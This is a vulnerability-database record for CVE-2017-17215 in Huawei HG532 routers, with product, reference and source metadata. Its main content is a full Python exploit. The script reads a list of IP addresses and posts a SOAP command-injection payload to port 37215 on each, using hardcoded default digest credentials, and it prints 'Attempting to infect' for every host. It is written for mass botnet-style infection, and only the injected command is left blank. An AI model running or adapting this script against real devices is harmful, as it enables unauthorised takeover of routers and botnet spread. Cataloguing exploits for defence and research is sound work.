ID
VAR-E-201712-0098
CVE
| cve_id: | CVE-2017-17215 | Trust: 1.3 |
EDB ID
43414
TITLE
Huawei Router HG532 - Arbitrary Command Execution - Hardware webapps Exploit
Trust: 0.6
DESCRIPTION
Huawei Router HG532 - Arbitrary Command Execution. CVE-2017-17215 . webapps exploit for Hardware platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | huawei | model: | router hg532 | scope: | - | version: | - | Trust: 1.6 |
| vendor: | huawei | model: | hg532 | scope: | eq | version: | 0 | Trust: 0.3 |
EXPLOIT
import threading, sys, time, random, socket, re, os, struct, array, requests
from requests.auth import HTTPDigestAuth
ips = open(sys.argv[1], "r").readlines()
cmd = "" # Your MIPS (SSHD)
rm = "<?xml version=\"1.0\" ?>\n <s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\n <s:Body><u:Upgrade xmlns:u=\"urn:schemas-upnp-org:service:WANPPPConnection:1\">\n <NewStatusURL>$(" + cmd + ")</NewStatusURL>\n<NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL>\n</u:Upgrade>\n </s:Body>\n </s:Envelope>"
class exploit(threading.Thread):
def __init__ (self, ip):
threading.Thread.__init__(self)
self.ip = str(ip).rstrip('\n')
def run(self):
try:
url = "http://" + self.ip + ":37215/ctrlt/DeviceUpgrade_1"
requests.post(url, timeout=5, auth=HTTPDigestAuth('dslf-config', 'admin'), data=rm)
print "[SOAP] Attempting to infect " + self.ip
except Exception as e:
pass
for ip in ips:
try:
n = exploit(ip)
n.start()
time.sleep(0.03)
except:
pass
Trust: 1.0
EXPLOIT LANGUAGE
py
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Arbitrary Command Execution
Trust: 1.6
CREDITS
anonymous
Trust: 0.6
EXTERNAL IDS
| db: | EXPLOIT-DB | id: | 43414 | Trust: 1.6 |
| db: | NVD | id: | CVE-2017-17215 | Trust: 1.3 |
| db: | EDBNET | id: | 95680 | Trust: 0.6 |
| db: | BID | id: | 102344 | Trust: 0.3 |
REFERENCES
| url: | https://nvd.nist.gov/vuln/detail/cve-2017-17215 | Trust: 1.0 |
| url: | https://pastebin.com/4nzunpb5 | Trust: 1.0 |
| url: | https://www.exploit-db.com/exploits/43414/ | Trust: 0.6 |
| url: | http://www.huawei.com/en/ | Trust: 0.3 |
| url: | https://blog.newskysecurity.com/huawei-router-exploit-involved-in-satori-and-brickerbot-given-away-for-free-on-christmas-by-ac52fe5e4516 | Trust: 0.3 |
| url: | http://www.huawei.com/my/psirt/security-notices/huawei-sn-20171130-01-hg532-en | Trust: 0.3 |
SOURCES
| db: | BID | id: | 102344 |
| db: | EXPLOIT-DB | id: | 43414 |
| db: | EDBNET | id: | 95680 |
LAST UPDATE DATE
2022-07-27T09:24:15.875000+00:00
SOURCES UPDATE DATE
| db: | BID | id: | 102344 | date: | 2017-12-28T00:00:00 |
SOURCES RELEASE DATE
| db: | BID | id: | 102344 | date: | 2017-12-28T00:00:00 |
| db: | EXPLOIT-DB | id: | 43414 | date: | 2017-12-25T00:00:00 |
| db: | EDBNET | id: | 95680 | date: | 2018-01-01T00:00:00 |